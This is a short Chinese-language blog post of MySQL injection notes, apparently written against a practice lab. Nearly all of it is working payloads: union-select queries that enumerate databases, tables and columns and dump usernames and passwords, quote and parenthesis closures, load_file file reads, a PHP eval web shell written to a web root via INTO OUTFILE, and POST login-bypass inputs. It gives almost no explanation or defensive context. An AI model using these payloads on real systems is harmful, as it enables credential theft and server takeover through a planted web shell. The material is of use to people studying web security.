Mysql注入笔记

Posted 2020-10-16 seeker01

1.基于字符型报错注入

报字段数：

‘ order by 3 --+    // “+” 代表空格

‘ union select 1,2,3 --+

‘ UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA --+  // 获取数据库信息

‘ UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479 --+  // 获取表信息

‘ UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 0x7573657273 --+  // 获取表字段信息

‘ UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+ // 获取数据o

2.基于数字型报错注入

不需要使用 ‘ 进行闭合，直接利用，利用方法和字符型一样

3.字符型报错注入（带()）

‘) order by 3--+  // 使用 )进行闭合

4.字符型报错注入（带"）

") order by 3--+  // 

5. 导入导出函数

select load_file(“C://TEST.txt”);

select "<?php eval($_POST[‘chybeta‘])?>" into outfile ‘C:/phpstudy/WWW/test/webshell.php‘;

select "<?php eval($_POST[‘chybeta‘])?>" dumpfile ‘C:/phpstudy/WWW/test/webshell.php‘;

6.POST类型注入

uname=admin‘#&passwd=chybeta&submit=Submit

uname=admin”#&passwd=chybeta&submit=Submit